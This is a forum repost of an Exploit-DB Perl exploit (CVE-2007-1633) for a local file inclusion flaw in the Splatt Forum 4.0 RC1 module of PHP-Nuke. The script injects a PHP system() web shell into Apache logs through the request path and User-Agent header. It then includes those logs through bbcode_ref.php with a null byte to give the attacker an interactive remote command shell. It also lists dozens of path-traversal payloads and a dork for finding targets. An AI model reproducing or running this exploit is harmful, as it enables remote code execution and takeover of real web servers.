Exploit PHP-Nuke Module splattforum 4.0 RC1 - Local File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3518
Проверка EDB
  1. Пройдено
Автор
GOLD_M
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-1633
Дата публикации
2007-03-19
Код:
#!/usr/bin/perl
# Modulo Splatt Forum v4.0 RC1(bbcode_ref.php name)Local File Include Exploit
# D.Script: http://sourceforge.net/projects/splattforum/
# V.Code
# $module_name = $name;   <<<-------- Line : 17
#
# include("modules/".$module_name."/functions.php");  <<<-------- Line : 19
# Dork: "Splatt Forum©"
# Discovered & Coded by : GolD_M = [Mahmood_ali]
# Contact:[email protected]
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
use IO::Socket;
use LWP::Simple;
@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
if (@ARGV < 3){
print "
##############################################################################
Modulo Splatt Forum v4.0 RC1(bbcode_ref.php name)Local File Include Exploit
          Usage: Gold.pl [VicTim] /modules/Forum/ [apachepath]
    Example: GolD.pl victim.com /modules/Forum/ ../logs/error.log
          Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
                 Discovered & Coded by : GolD_M = [Mahmood_ali]
##############################################################################
";
exit();
}

$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];

print "Injecting code in log files...\n";
$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connect Failed.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "User-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "Write END to exit!\n";
print "IF not working try another apache path\n\n";

print "[shell] ";$cmd = <STDIN>;

while($cmd !~ "END") {
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connect Failed.\n\n";
    print $socket "GET ".$path."bbcode_ref.php?name=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n";
    print $socket "Host: ".$host."\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\n";

    while ($raspuns = <$socket>)
    {
        print $raspuns;
    }

    print "[shell] ";
    $cmd = <STDIN>;
}

# milw0rm.com [2007-03-19]
 
Источник
www.exploit-db.com

Похожие темы